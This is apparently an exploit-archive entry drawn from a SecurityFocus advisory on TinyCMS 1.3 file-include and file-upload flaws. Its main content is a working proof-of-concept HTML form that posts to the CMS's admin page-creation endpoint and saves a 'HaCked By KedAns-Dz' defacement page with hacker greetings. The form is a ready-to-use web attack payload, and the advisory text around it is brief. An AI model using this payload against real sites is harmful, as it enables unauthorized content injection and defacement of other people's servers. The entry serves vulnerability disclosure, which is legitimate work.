20 lines
No EOL
902 B
HTML
20 lines
No EOL
902 B
HTML
source: https://www.securityfocus.com/bid/53761/info
|
|
|
|
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
|
|
|
|
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
|
|
|
|
TinyCMS 1.3 is vulnerable; other versions may also be affected.
|
|
|
|
<form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'>
|
|
<strong>Page Title :</strong>
|
|
<input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'>
|
|
<textarea id="elm1" name="page">
|
|
<center>
|
|
<h1> HaCked By KedAns-Dz </h1>
|
|
<h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2>
|
|
<h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3>
|
|
</center>
|
|
</textarea>
|
|
<input type='submit' value='Upload Page'>
|
|
</form> |